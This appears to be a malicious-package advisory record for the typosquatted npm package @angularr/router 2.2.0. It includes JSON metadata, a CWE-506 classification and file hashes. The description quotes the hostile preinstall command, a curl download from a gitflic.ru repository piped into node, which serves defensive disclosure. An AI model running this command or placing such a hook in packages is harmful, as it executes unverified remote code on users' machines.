-= Per source details. Do not edit below this line.=-
The package.json preinstall script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an unpinned, unverified JavaScript payload from a third-party repository (gitflic.ru user hellscripter, proxied via web.archive.org) and piping it directly into Node for execution during npm install. The code executes with the installer's privileges before any package code is loaded. The package name @angularr/router (double-r) resembles @angular/router, while the shipped library code is a verbatim copy of pillarjs/router (unrelated to Angular) that serves as cover for the malicious lifecycle hook.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020909",
"import_time": "2026-10-04T23:40:40.951801571Z",
"modified_time": "2026-10-04T23:18:03Z",
"sha256": "646c9fd4e8d09651eb6d5ec997e6d1b62f294d39d52ec3b4143853c922f15e83",
"source": "amazon-inspector",
"versions": [
"2.2.0"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "5f1f5a2499b09d6cbe0b9c7598c0b8245a737d069009eafd4b780c98ca280301",
"tlsh": "db21db31cc489c3312c92af578295043b561480b8d04fe1db7ee032c4f4e26f657aa29"
}
],
"package_integrity": [
{
"filename": "router-2.2.0.tgz",
"hashes": {
"sha1": "90e5f2267e7b9561b10113e7544771f0f9bf3d48",
"sha512_sri": "sha512-bx9e3exgfGJojDnzwsf0V6HXAnVVQry8IbwC2ItqYpZfE3IFfY03B4KORjudfhwdz4QZHxZ60L6I8M5U7cBpeg=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angularr/router/MAL-2026-17494.json"